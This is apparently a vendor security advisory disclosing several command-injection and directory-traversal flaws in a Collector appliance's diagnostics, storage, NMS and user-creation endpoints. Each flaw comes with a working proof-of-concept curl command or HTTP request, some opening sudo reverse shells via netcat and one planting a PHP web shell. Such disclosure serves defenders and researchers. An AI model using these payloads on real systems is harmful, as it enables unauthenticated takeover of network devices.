Synopsis
CVE-2019-12985: /Collector/diagnostics/ping Unauthenticated Command Injection
The "ping" action in DiagnosticsController is susceptible to command injection by a remote, unauthenticated attacker. Specifically, the ping function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for 'ipAddress', 'pingCount', or 'packetSize'.
Proof of Concept
ncip=192.168.1.191 ncport=4444 target=192.168.1.198 curl --insecure -d 'ipAddress=%60sudo+/bin/nc+-nv+'$ncip'+'$ncport'+-e+/bin/bash%60' https://$target/Collector/diagnostics/ping
CVE-2019-12986: /Collector/diagnostics/trace_route Unauthenticated Command Injection
The "trace_route" action in DiagnosticsController is susceptible to command injection by a remote, unauthenticated attacker. Specifically, the trace_route function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for 'ipAddress'.
Proof of Concept
ncip=192.168.1.191 ncport=4444 target=192.168.1.198 curl --insecure -d 'ipAddress=%60sudo+/bin/nc+-nv+'$ncip'+'$ncport'+-e+/bin/bash%60' https://$target/Collector/diagnostics/trace_route
CVE-2019-12987: /Collector/storagemgmt/apply Unauthenticated Command Injection
The "apply" action in StorageMgmtController is susceptible to command injection by a remote, unauthenticated attacker. Specifically, the callStoragePerl function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying an array value with crafted values for 'action', 'host', 'path', or 'type'.
Proof of Concept
ncip=192.168.1.191 ncport=4444 target=192.168.1.198 curl --insecure 'https://'$target'/Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60sudo+/bin/nc+-nv+'$ncip'+'$ncport'+-e+/bin/bash%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype'
CVE-2019-12988: /Collector/nms/addModifyZTDProxy Unauthenticated Command Injection
The "addModifyZTDProxy" action in NmsController is susceptible to command injection by a remote, unauthenticated attacker. Specifically, the addModifyZTDProxy function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for 'ztd_password'.
Proof of Concept
ncip=192.168.1.191 ncport=4444 target=192.168.1.198 curl --insecure 'https://'$target'/Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(sudo$IFS/bin/nc$IFS-nv$IFS$(/bin/echo$IFS-e$IFS\x3'$ncip')$IFS$(/bin/echo$IFS-e$IFS\x3'$ncport')$IFS-e$IFS/bin/bash)'
CVE-2019-12990: /Collector/appliancesettings/applianceSettingsFileTransfer Unauthenticated Directory Traversal File Write
The "applianceSettingsFileTransfer" action in ApplianceSettingsController is susceptible to directory traversal by a remote, unauthenticated attacker. Specifically, the applianceSettingsFileTransfer function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a file system path. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted values for 'filename', 'filedata', and 'workspace_id'. This vulnerability can be exploited to write files to locations writable by the 'www-data' user. Furthermore, an attacker could write a crafted PHP file to /home/talariuser/www/app/webroot/files/ to execute arbitrary PHP code.
Proof of Concept
ncip=192.168.1.191 ncport=4444 target=192.168.1.198 curl --insecure -d 'filename=../../../../../../home/talariuser/www/app/webroot/files/shell.php&filedata=' https://$target/Collector/appliancesettings/applianceSettingsFileTransfer curl --insecure https://$target/talari/app/files/shell.php
CVE-2019-12992: /Users/create Authenticated Command Injection
The "create" action in UsersController is susceptible to command injection by a remote, authenticated attacker. Specifically, the create function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a shell command. An attacker can trigger this vulnerability by supplying a crafted value for 'level'. Note: when $level is compared to an integer value (using ==), it is converted to 0 (int). This is why validation passes. Type checking would help here (===).
Proof of Concept
POST /Users/create HTTP/1.1 Host: 192.168.1.198 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.198/Users?rdx=true Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 149 Connection: close Cookie: urlhashcomponent=; VWCSession=15jjk7584jmn9v5na2q6gspnc3 username=scooby&level=`sudo+touch+/var/tmp/vuln_6`&password=password&confirm_password=password&secAuth=false&csrf_token=9b97e4423f0f0bdf18e089b2de3c8e78
[email protected]:/opt/citrix/licensing/LS# ls -l /var/tmp total 0 -rw-r--r-- 1 ctxlsuser lmadmin 0 Apr 12 01:32 lockCITRIX -rw-r--r-- 1 root root 0 Apr 12 02:49 vuln_6
Solution
Additional References
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]